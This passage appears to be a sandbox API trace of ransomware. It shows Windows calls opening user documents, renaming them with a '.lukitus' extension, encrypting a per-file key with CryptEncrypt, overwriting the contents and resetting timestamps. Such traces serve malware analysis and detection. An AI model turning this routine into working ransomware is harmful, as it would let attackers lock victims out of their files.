dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.605] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.605] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.605] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.605] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.605] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.605] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.605] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.605] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.605] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.605] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.605] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.605] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.605] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.605] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.605] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.605] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.605] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.605] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.605] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.605] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe74, cbMultiByte=4, lpWideCharStr=0x281f558, cchWideChar=4 | out: lpWideCharStr="41BB") returned 4 [0106.605] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe70, cbMultiByte=4, lpWideCharStr=0x281f548, cchWideChar=4 | out: lpWideCharStr="9663") returned 4 [0106.605] CreateFileW (lpFileName="c:\\Users\\aETAdzjz\\Desktop\\0Q64daekSd8g.xlsx" (normalized: "c:\\users\\aetadzjz\\desktop\\0q64daeksd8g.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0106.605] MoveFileExW (lpExistingFileName="c:\\Users\\aETAdzjz\\Desktop\\0Q64daekSd8g.xlsx" (normalized: "c:\\users\\aetadzjz\\desktop\\0q64daeksd8g.xlsx"), lpNewFileName="c:\\Users\\aETAdzjz\\Desktop\\F56924BE-9663-41BB-7CCB072C-C1747AEA88B6.lukitus" (normalized: "c:\\users\\aetadzjz\\desktop\\f56924be-9663-41bb-7ccb072c-c1747aea88b6.lukitus"), dwFlags=0x9) returned 1 [0106.609] CryptGenRandom (in: hProv=0x606b98, dwLen=0x10, pbBuffer=0x281f6dc | out: pbBuffer=0x281f6dc) returned 1 [0106.609] CryptEncrypt (in: hKey=0x5fc258, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x10, dwBufLen=0x100 | out: pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x100) returned 1 [0106.615] ReadFile (in: hFile=0x324, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x17554, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x17554, lpOverlapped=0x0) returned 1 [0106.616] SetFilePointer (in: hFile=0x324, lDistanceToMove=0, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x0 [0106.616] WriteFile (in: hFile=0x324, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x17554, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x17554, lpOverlapped=0x0) returned 1 [0106.616] WriteFile (in: hFile=0x324, lpBuffer=0x281f6c8*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x281f6c8*, lpNumberOfBytesWritten=0x281f598*=0x344, lpOverlapped=0x0) returned 1 [0106.616] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x281fc94 | out: lpSystemTimeAsFileTime=0x281fc94*(dwLowDateTime=0x63922610, dwHighDateTime=0x1d31760)) [0106.616] SetFileTime (hFile=0x324, lpCreationTime=0x281fc94, lpLastAccessTime=0x281fc94, lpLastWriteTime=0x281fc94) returned 1 [0106.617] FlushFileBuffers (hFile=0x324) returned 1 [0106.621] GetFileAttributesExW (in: lpFileName="c:\\Users\\aETAdzjz\\Documents\\GQc8.ots" (normalized: "c:\\users\\aetadzjz\\documents\\gqc8.ots"), fInfoLevelId=0x0, lpFileInformation=0x281f9e8 | out: lpFileInformation=0x281f9e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x196b9030, ftCreationTime.dwHighDateTime=0x1d30036, ftLastAccessTime.dwLowDateTime=0x83985b70, ftLastAccessTime.dwHighDateTime=0x1d2f8cd, ftLastWriteTime.dwLowDateTime=0x83985b70, ftLastWriteTime.dwHighDateTime=0x1d2f8cd, nFileSizeHigh=0x0, nFileSizeLow=0x14aa7)) returned 1 [0106.621] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.622] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.622] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.622] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.622] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.622] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.622] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.622] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.622] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.622] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.622] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.622] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.622] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.622] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.622] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.622] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.622] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.622] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.622] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.622] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.622] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe74, cbMultiByte=4, lpWideCharStr=0x281f558, cchWideChar=4 | out: lpWideCharStr="41BB") returned 4 [0106.622] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe70, cbMultiByte=4, lpWideCharStr=0x281f548, cchWideChar=4 | out: lpWideCharStr="9663") returned 4 [0106.622] CreateFileW (lpFileName="c:\\Users\\aETAdzjz\\Documents\\GQc8.ots" (normalized: "c:\\users\\aetadzjz\\documents\\gqc8.ots"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0106.623] MoveFileExW (lpExistingFileName="c:\\Users\\aETAdzjz\\Documents\\GQc8.ots" (normalized: "c:\\users\\aetadzjz\\documents\\gqc8.ots"), lpNewFileName="c:\\Users\\aETAdzjz\\Documents\\F56924BE-9663-41BB-6F1F87E1-0611DE322330.lukitus" (normalized: "c:\\users\\aetadzjz\\documents\\f56924be-9663-41bb-6f1f87e1-0611de322330.lukitus"), dwFlags=0x9) returned 1 [0106.625] CryptGenRandom (in: hProv=0x606b98, dwLen=0x10, pbBuffer=0x281f6dc | out: pbBuffer=0x281f6dc) returned 1 [0106.625] CryptEncrypt (in: hKey=0x5fc258, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x10, dwBufLen=0x100 | out: pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x100) returned 1 [0106.630] ReadFile (in: hFile=0x324, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x14aa7, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x14aa7, lpOverlapped=0x0) returned 1 [0106.631] SetFilePointer (in: hFile=0x324, lDistanceToMove=0, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x0 [0106.631] WriteFile (in: hFile=0x324, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x14aa7, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x14aa7, lpOverlapped=0x0) returned 1 [0106.631] WriteFile (in: hFile=0x324, lpBuffer=0x281f6c8*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x281f6c8*, lpNumberOfBytesWritten=0x281f598*=0x344, lpOverlapped=0x0) returned 1 [0106.631] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x281fc94 | out: lpSystemTimeAsFileTime=0x281fc94*(dwLowDateTime=0x63948770, dwHighDateTime=0x1d31760)) [0106.631] SetFileTime (hFile=0x324, lpCreationTime=0x281fc94, lpLastAccessTime=0x281fc94, lpLastWriteTime=0x281fc94) returned 1 [0106.631] FlushFileBuffers (hFile=0x324) returned 1 [0106.635] GetFileAttributesExW (in: lpFileName="c:\\Users\\aETAdzjz\\Documents\\OneNote Notebooks\\My Notebook\\Open Notebook.onetoc2" (normalized: "c:\\users\\aetadzjz\\documents\\onenote notebooks\\my notebook\\open notebook.onetoc2"), fInfoLevelId=0x0, lpFileInformation=0x281f9e8 | out: lpFileInformation=0x281f9e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90ad5d60, ftCreationTime.dwHighDateTime=0x1d2f189, ftLastAccessTime.dwLowDateTime=0x90ad5d60, ftLastAccessTime.dwHighDateTime=0x1d2f189, ftLastWriteTime.dwLowDateTime=0x918137c0, ftLastWriteTime.dwHighDateTime=0x1d2f189, nFileSizeHigh=0x0, nFileSizeLow=0x1828)) returned 1 [0106.635] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.635] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.635] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.635] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.635] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.635] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.635] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.635] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.635] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.635] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.635] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.635] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.635] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.635] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.635] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.635] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.635] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.635] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.635] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.635] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.635] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe74, cbMultiByte=4, lpWideCharStr=0x281f558, cchWideChar=4 | out: lpWideCharStr="41BB") returned 4 [0106.635] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe70, cbMultiByte=4, lpWideCharStr=0x281f548, cchWideChar=4 | out: lpWideCharStr="9663") returned 4 [0106.635] CreateFileW (lpFileName="c:\\Users\\aETAdzjz\\Documents\\OneNote Notebooks\\My Notebook\\Open Notebook.onetoc2" (normalized: "c:\\users\\aetadzjz\\documents\\onenote notebooks\\my notebook\\open notebook.onetoc2"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0106.635] MoveFileExW (lpExistingFileName="c:\\Users\\aETAdzjz\\Documents\\OneNote Notebooks\\My Notebook\\Open Notebook.onetoc2" (normalized: "c:\\users\\aetadzjz\\documents\\onenote notebooks\\my notebook\\open notebook.onetoc2"), lpNewFileName="c:\\Users\\aETAdzjz\\Documents\\OneNote Notebooks\\My Notebook\\F56924BE-9663-41BB-93122862-1B3365D6FC4A.lukitus" (normalized: "c:\\users\\aetadzjz\\documents\\onenote notebooks\\my notebook\\f56924be-9663-41bb-93122862-1b3365d6fc4a.lukitus"), dwFlags=0x9) returned 1 [0106.637] CryptGenRandom (in: hProv=0x606b98, dwLen=0x10, pbBuffer=0x281f6dc | out: pbBuffer=0x281f6dc) returned 1 [0106.637] CryptEncrypt (in: hKey=0x5fc258, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x10, dwBufLen=0x100 | out: pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x100) returned 1 [0106.648] ReadFile (in: hFile=0x324, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x1828, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x1828, lpOverlapped=0x0) returned 1 [0106.653] SetFilePointer (in: hFile=0x324, lDistanceToMove=0, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x0 [0106.653] WriteFile (in: hFile=0x324, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x1828, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x1828, lpOverlapped=0x0) returned 1 [0106.653] WriteFile (in: hFile=0x324, lpBuffer=0x281f6c8*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x281f6c8*, lpNumberOfBytesWritten=0x281f598*=0x344, lpOverlapped=0x0) returned 1 [0106.653] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x281fc94 | out: lpSystemTimeAsFileTime=0x281fc94*(dwLowDateTime=0x6396e8d0, dwHighDateTime=0x1d31760)) [0106.653] SetFileTime (hFile=0x324, lpCreationTime=0x281fc94, lpLastAccessTime=0x281fc94, lpLastWriteTime=0x281fc94) returned 1 [0106.654] FlushFileBuffers (hFile=0x324) returned 1 [0106.663] GetFileAttributesExW (in: lpFileName="c:\\Users\\aETAdzjz\\Documents\\A4tJ-zen y.odp" (normalized: "c:\\users\\aetadzjz\\documents\\a4tj-zen y.odp"), fInfoLevelId=0x0, lpFileInformation=0x281f9e8 | out: lpFileInformation=0x281f9e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd95c8e30, ftCreationTime.dwHighDateTime=0x1d2f9c9, ftLastAccessTime.dwLowDateTime=0x83036bd0, ftLastAccessTime.dwHighDateTime=0x1d2fe1a, ftLastWriteTime.dwLowDateTime=0x83036bd0, ftLastWriteTime.dwHighDateTime=0x1d2fe1a, nFileSizeHigh=0x0, nFileSizeLow=0xf470)) returned 1 [0106.663] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.663] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.663] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.663] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.663] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.663] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.663] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.663] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.664] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.664] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.664] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.664] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.664] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.664] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.664] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.664] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.664] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.664] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.664] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.664] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.664] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe74, cbMultiByte=4, lpWideCharStr=0x281f558, cchWideChar=4 | out: lpWideCharStr="41BB") returned 4 [0106.664] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe70, cbMultiByte=4, lpWideCharStr=0x281f548, cchWideChar=4 | out: lpWideCharStr="9663") returned 4 [0106.664] CreateFileW (lpFileName="c:\\Users\\aETAdzjz\\Documents\\A4tJ-zen y.odp" (normalized: "c:\\users\\aetadzjz\\documents\\a4tj-zen y.odp"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0106.664] MoveFileExW (lpExistingFileName="c:\\Users\\aETAdzjz\\Documents\\A4tJ-zen y.odp" (normalized: "c:\\users\\aetadzjz\\documents\\a4tj-zen y.odp"), lpNewFileName="c:\\Users\\aETAdzjz\\Documents\\F56924BE-9663-41BB-7F7DF4F3-FEE5A0F835D8.lukitus" (normalized: "c:\\users\\aetadzjz\\documents\\f56924be-9663-41bb-7f7df4f3-fee5a0f835d8.lukitus"), dwFlags=0x9) returned 1 [0106.665] CryptGenRandom (in: hProv=0x606b98, dwLen=0x10, pbBuffer=0x281f6dc | out: pbBuffer=0x281f6dc) returned 1 [0106.665] CryptEncrypt (in: hKey=0x5fc258, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x10, dwBufLen=0x100 | out: pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x100) returned 1 [0106.671] ReadFile (in: hFile=0x324, lpBuffer=0x2da0020, nNumberOfBytesToRead=0xf470, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0xf470, lpOverlapped=0x0) returned 1 [0106.671] SetFilePointer (in: hFile=0x324, lDistanceToMove=0, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x0 [0106.671] WriteFile (in: hFile=0x324, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0xf470, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0xf470, lpOverlapped=0x0) returned 1 [0106.672] WriteFile (in: hFile=0x324, lpBuffer=0x281f6c8*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x281f6c8*, lpNumberOfBytesWritten=0x281f598*=0x344, lpOverlapped=0x0) returned 1 [0106.672] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x281fc94 | out: lpSystemTimeAsFileTime=0x281fc94*(dwLowDateTime=0x639bab90, dwHighDateTime=0x1d31760)) [0106.672] SetFileTime (hFile=0x324, lpCreationTime=0x281fc94, lpLastAccessTime=0x281fc94, lpLastWriteTime=0x281fc94) returned 1 [0106.672] FlushFileBuffers (hFile=0x324) returned 1 [0106.675] GetFileAttributesExW (in: lpFileName="c:\\Users\\aETAdzjz\\Documents\\gxamJ-HMXiK0nNB-ChDC.pptx" (normalized: "c:\\users\\aetadzjz\\documents\\gxamj-hmxik0nnb-chdc.pptx"), fInfoLevelId=0x0, lpFileInformation=0x281f9e8 | out: lpFileInformation=0x281f9e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd60d1440, ftCreationTime.dwHighDateTime=0x1d31263, ftLastAccessTime.dwLowDateTime=0xa1397820, ftLastAccessTime.dwHighDateTime=0x1d2c82c, ftLastWriteTime.dwLowDateTime=0xa1397820, ftLastWriteTime.dwHighDateTime=0x1d2c82c, nFileSizeHigh=0x0, nFileSizeLow=0x8856)) returned 1 [0106.675] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.675] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.675] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.675] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.675] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.675] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.675] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.675] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.675] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.675] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.675] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.675] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.675] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.675] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.675] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.675] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.675] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.675] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.675] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.675] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.675] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, 